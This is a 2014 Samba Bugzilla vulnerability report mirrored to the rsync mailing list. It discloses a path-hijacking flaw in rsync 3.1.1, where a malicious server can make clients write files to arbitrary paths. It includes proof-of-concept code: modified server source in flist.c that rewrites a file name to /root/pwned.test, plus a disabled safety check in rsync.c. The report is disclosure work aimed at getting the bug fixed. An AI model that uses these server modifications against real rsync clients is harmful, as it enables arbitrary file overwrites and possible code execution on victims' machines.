[Bug 10936] New: Rsync path hijacking attack vulnerability

samba-bugs at samba.org samba-bugs at samba.org
Thu Nov 13 23:51:40 MST 2014 

https://bugzilla.samba.org/show_bug.cgi?id=10936

            Bug ID: 10936
           Summary: Rsync  path  hijacking  attack  vulnerability
           Product: rsync
           Version: 3.1.1
          Hardware: All
                OS: All
            Status: NEW
          Severity: critical
          Priority: P5
         Component: core
          Assignee: wayned at samba.org
          Reporter: gaojianfeng at baidu.com
        QA Contact: rsync-qa at samba.org

Created attachment 10433
  --> https://bugzilla.samba.org/attachment.cgi?id=10433&action=edit
Rsync  path  hijacking  attack  vulnerability.pdf (Detailed documentation)

Hi all:
    In  newest version rsync,Baidu Security Team found a vulnerability which is
similar to wget ftp CVE-2014-4877
(http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877).When a
clientuses parameter -a to synchronize files of the server-side(default), for
example:
rsync -avzP  127.0.0.1::share   /tmp/share
Rsync  recursive synchronous all files,An attacker can hijack the file path  by
modifying the code of the server-side,allows remote  servers to write to
arbitrary files, and consequently execute arbitrary code .

Vulnerability  Details :
First I shared in the Rsync folder to write the following documents
[root at pentest rsync]# ls -lh
total 8.0K
-rw-r--r-- 1 root root    2 Oct 31 03:16 1.txt
drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir
[root at pentest rsync]# cd  truedir/
[root at pentest truedir]# ls
pwned
[root at pentest truedir]# cat   pwned
rsync test
[root at pentest truedir]#
Next I modify the server to send the file code,in the process of
synchronizing,the path of file 
"pwned" can be blocked and changed into any path .
file: flist.c    line:394

static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
                const char *symlink_name, int symlink_len,
#endif
                int ndx, int first_ndx)
{
  if(strcmp(fname,"turedir/pwned") == 0){

      fname="/root/pwned.test"; //Arbitrarily path 


  }
Then, verification occurs in the server-side and says “received request to
transfer non-regular file 
 /root/pwned.test 7 [sender]”,But as an attacker, the code of the server-side
can be arbitrarily 
controlled,Shielding the following code.
file:rsync.c   line:405​

/*
    if (iflags & ITEM_TRANSFER) {
        int i = ndx - cur_flist->ndx_start;
        if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
            rprintf(FERROR,
                "received request to transfer non-regular file: %d [%s]\n",
                ndx, who_am_i());
            exit_cleanup(RERR_PROTOCOL);
        }
    }
    */

The file "pwned" will be downloaded into forged path(/root/pwned.test).

-- 
You are receiving this mail because:
You are the QA Contact for the bug.

More information about the rsync mailing list